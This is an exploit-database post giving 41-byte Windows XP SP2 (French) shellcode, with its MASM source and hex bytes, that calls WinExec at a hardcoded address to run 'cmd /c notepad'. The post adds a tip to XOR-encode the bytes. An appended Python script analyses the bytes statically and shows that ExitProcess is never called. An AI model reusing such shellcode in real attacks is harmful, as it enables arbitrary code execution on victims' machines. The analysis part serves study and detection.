========================================
windows xp-sp2 (fr) notepad.exe 41 bytes
========================================

Inj3ct0r >> Exploit database separated by exploit type (local, remote, DoS, etc.)

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] Support e-mail : submit[at]inj3ct0r.com
#[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net

windows xp-sp2 (fr) notepad.exe 41 bytes
author opt!x hacker

######################################################
In this shellcode I use 2 APIs found in kernel32.dll in Windows XP SP2 (fr):

    WinExec     : 0x7C8615B5
    ExitProcess : 0x7C81CA82

######################################################
Here is the assembly code using MASM32:
######################################################

    .386
    .model flat, stdcall
    option casemap:none
    include windows.inc

    .data

    .code
    code:
        xor  edx, edx
        mov  edx, 7C8615B5h      ; WinExec, hardcoded XP SP2 (fr) address
        call edx                 ; lpCmdLine = return address pushed by `call code` (points at the string);
                                 ; uCmdShow = whatever was already on the stack
        xor  edx, edx
        mov  edx, 7C81CA82h      ; ExitProcess, hardcoded XP SP2 (fr) address
                                 ; no `call edx` follows, so ExitProcess is never invoked:
                                 ; after WinExec returns, execution falls through into `call code` again
    data:
        call code                ; pushes the address of the string below as WinExec's first argument
        db 'cmd /c notepad', 0   ; command line; the terminating 0 is present in the shellcode bytes
    end data                     ; entry point is `data`, so the string is never executed as code

##############################################################
And this is the shellcode; you just have to encode it with an XOR encoder, but it's working for me without encoding:

    "\xE9\x10\x00\x00\x00\x31\xD2\xBA\xB5\x15\x86\x7C\xFF\xD2\x31\xD2\xBA\x82"
    "\xCA\x81\x7C\xE8\xEB\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63\x20\x6E\x6F\x74\x65"
    "\x70\x61\x64\x00"

The leading \xE9\x10\x00\x00\x00 is a `jmp data` to the `call code` at offset 0x15; the MASM listing expresses the same entry point with `end data`. The remaining bytes match the listing above instruction for instruction, including the absence of a `call edx` after the ExitProcess address is loaded.

---------------------------------
ThE End =]

Visit my proj3ct :
http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net

# ~ - [ [ : Inj3ct0r : ] ]
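As an added analysis example (not part of the original post), the following Python walks the 41-byte string above statically: it decodes only the five x86 encodings the shellcode uses, follows the `jmp` / `call code` flow, recovers the command string from the return address that `call` pushes, maps the two hardcoded addresses back to names using the table the post gives, and reports that ExitProcess is loaded but never called, so control falls back into `call code`. The address table is the post's; everything else (function names, the summary dict) is this example's own.

```python
import struct

# The 41-byte shellcode string from the post, as a byte literal (input to the walk).
SHELLCODE = (
    b"\xE9\x10\x00\x00\x00\x31\xD2\xBA\xB5\x15\x86\x7C\xFF\xD2\x31\xD2\xBA\x82"
    b"\xCA\x81\x7C\xE8\xEB\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63\x20\x6E\x6F\x74\x65"
    b"\x70\x61\x64\x00"
)

# Absolute kernel32.dll addresses the post quotes for Windows XP SP2 (French).
# They are build-specific: on any other build the same bytes call into unrelated code.
KNOWN_APIS = {0x7C8615B5: "WinExec", 0x7C81CA82: "ExitProcess"}


def decode(code, off):
    """Decode one instruction at `off` and return (mnemonic, length, operand).
    Only the five encodings this shellcode uses are handled; any other byte
    raises so that unexpected code is reported instead of silently skipped."""
    op = code[off]
    if op in (0xE9, 0xE8):                       # jmp rel32 / call rel32
        rel = struct.unpack_from("<i", code, off + 1)[0]
        return ("jmp" if op == 0xE9 else "call", 5, off + 5 + rel)
    if op == 0xBA:                               # mov edx, imm32
        return ("mov edx", 5, struct.unpack_from("<I", code, off + 1)[0])
    if op == 0x31 and code[off + 1] == 0xD2:     # xor edx, edx
        return ("xor edx", 2, None)
    if op == 0xFF and code[off + 1] == 0xD2:     # call edx
        return ("call edx", 2, None)
    raise ValueError(f"unhandled opcode {op:#04x} at offset {off:#x}")


def cstring_at(code, off):
    """Read the NUL-terminated ASCII string starting at `off`."""
    return code[off:code.index(b"\x00", off)].decode("ascii")


def analyse(code, max_steps=64):
    """Walk control flow from offset 0, modelling only edx and the return
    addresses pushed by `call`. Records each API address loaded into edx, each
    indirect call together with the string its pushed argument points at, and
    the first offset reached twice (a fall-through loop)."""
    off, edx, stack, visited = 0, 0, [], set()
    loaded, calls, loop_at = [], [], None
    for _ in range(max_steps):
        if off in visited:
            loop_at = off
            break
        visited.add(off)
        mnem, size, operand = decode(code, off)
        if mnem == "jmp":
            off = operand
        elif mnem == "call":
            stack.append(off + size)             # return address = the string that follows
            off = operand
        elif mnem == "xor edx":
            edx, off = 0, off + size
        elif mnem == "mov edx":
            edx = operand
            loaded.append(KNOWN_APIS.get(edx, f"unknown:{edx:#010x}"))
            off += size
        elif mnem == "call edx":
            name = KNOWN_APIS.get(edx, f"unknown:{edx:#010x}")
            # The slot on top of the stack is WinExec's lpCmdLine; the uCmdShow
            # slot beneath it is whatever the stack held before the shellcode ran.
            arg = cstring_at(code, stack.pop()) if stack else None
            calls.append((name, arg))
            if name == "ExitProcess":
                break                            # nothing executes after a real ExitProcess
            off += size                          # model the API returning to its caller
    command = next((a for n, a in calls if n == "WinExec"), None)
    return {"loaded": loaded, "calls": calls, "command": command, "loop_at": loop_at}


if __name__ == "__main__":
    report = analyse(SHELLCODE)
    print(f"{len(SHELLCODE)} bytes; APIs loaded: {report['loaded']}")
    for name, arg in report["calls"]:
        print(f"  {name}({arg!r})")
    if report["loop_at"] is not None:
        print(f"  falls back into offset {report['loop_at']:#x} -> WinExec is called again")
```

Running it on the bytes above yields one `WinExec("cmd /c notepad")` call, both addresses loaded, and a loop back to offset 0x15: the sequence that makes hardcoded-address shellcode easy to fingerprint is exactly the `mov edx, imm32` / `call edx` pair, and the immediate values are only meaningful on the single kernel32 build they were taken from.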